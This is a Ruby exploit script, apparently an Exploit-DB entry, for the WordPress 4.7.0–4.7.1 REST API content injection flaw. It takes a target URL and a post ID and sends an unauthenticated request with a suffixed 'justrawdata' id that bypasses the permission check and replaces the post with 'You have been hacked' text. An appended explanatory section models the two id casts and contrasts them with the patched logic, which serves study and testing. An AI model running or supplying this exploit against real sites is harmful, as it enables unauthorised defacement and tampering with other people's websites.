
39 lines
No EOL
1 KiB
Ruby
Executable file
# Exploit Title: WP Content Injection
# Date: 31 Jan 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: WordPress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: BackBox Ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby

require 'rest-client'
require 'json'

puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp.chomp('/')   # drop a trailing slash so the route is not doubled

puts "Enter Post ID"
postid = gets.chomp.to_i

# The "id" in the JSON body takes precedence over the numeric id in the route.
# A non-numeric value such as "1justrawdata" makes the permission check's post
# lookup fail (so the capability check is skipped) while the update step still
# casts it to the real post id.
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id"      => "#{postid}justrawdata",
    "title"   => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept       => :json
) { |response, request, result| response }   # hand back non-2xx responses instead of raising

if response.code == 200
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
  puts "This site is not Vulnerable"
end
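The exploit above works only because of the "justrawdata" suffix on the JSON "id". The following is an added example, not part of the original exploit and not WordPress code: a Ruby model of the two different readings of the post id that the Sucuri write-up describes for 4.7.0/4.7.1. It assumes (simplified) that the permission check looked the post up with a strict numeric test on the raw id and skipped the capability check when no post was found, while the update step cast the same id with PHP's (int), which keeps the leading digits. The sample post table and the helper names are constructed for the example.

```ruby
# Added example (not part of the original exploit, nor WordPress code): models
# why the exploit sends "<id>justrawdata" as the JSON "id".
#
# Assumption, simplified from the cited Sucuri write-up: in WordPress
# 4.7.0/4.7.1 the REST update handler's permission check looked the post up
# with the raw request id using a strict numeric test and skipped the
# capability check when no post was found; the update step then cast the same
# id with PHP's (int), which keeps the leading digits.

# Constructed sample post table: id => title.
SAMPLE_POSTS = { 1 => "Hello world!", 7 => "About" }.freeze

# Strict check, modelled (simplified) on PHP is_numeric(): the whole string
# must be a decimal number.
def strict_numeric?(value)
  !!(value.to_s =~ /\A[+-]?\d+(\.\d+)?\z/)
end

# Lenient cast, modelled on PHP (int) applied to a string: leading digits,
# otherwise 0.
def php_int_cast(value)
  m = value.to_s[/\A[+-]?\d+/]
  m ? m.to_i : 0
end

# Vulnerable flow. Returns the id of the post that gets overwritten, or nil
# when the request is refused. `can_edit` is whether the caller holds the
# edit capability; an unauthenticated client never does.
def vulnerable_update(raw_id, posts, can_edit:)
  post = strict_numeric?(raw_id) ? posts[php_int_cast(raw_id)] : nil
  return nil if post && !can_edit   # capability check only runs when a post was found
  target = php_int_cast(raw_id)     # update step re-reads the same id leniently
  posts.key?(target) ? target : nil
end

# Patched flow: the id is validated as a plain integer before any lookup, so
# both steps see the same value and the capability check always applies.
def patched_update(raw_id, posts, can_edit:)
  return nil unless raw_id.to_s.match?(/\A\d+\z/)
  target = raw_id.to_i
  return nil unless posts.key?(target)
  can_edit ? target : nil
end

if __FILE__ == $0
  puts "vulnerable, id=1:            #{vulnerable_update('1', SAMPLE_POSTS, can_edit: false).inspect}"
  puts "vulnerable, id=1justrawdata: #{vulnerable_update('1justrawdata', SAMPLE_POSTS, can_edit: false).inspect}"
  puts "patched,    id=1justrawdata: #{patched_update('1justrawdata', SAMPLE_POSTS, can_edit: false).inspect}"
end
```

The first call refuses an unauthenticated plain "1" (the post is found, so the capability check runs and fails); the second returns 1 for "1justrawdata", which is the bypass the exploit relies on; the patched flow rejects the suffixed id before any lookup. The same contrast is a useful unit test for any REST handler that reads one identifier in two places with two different casts.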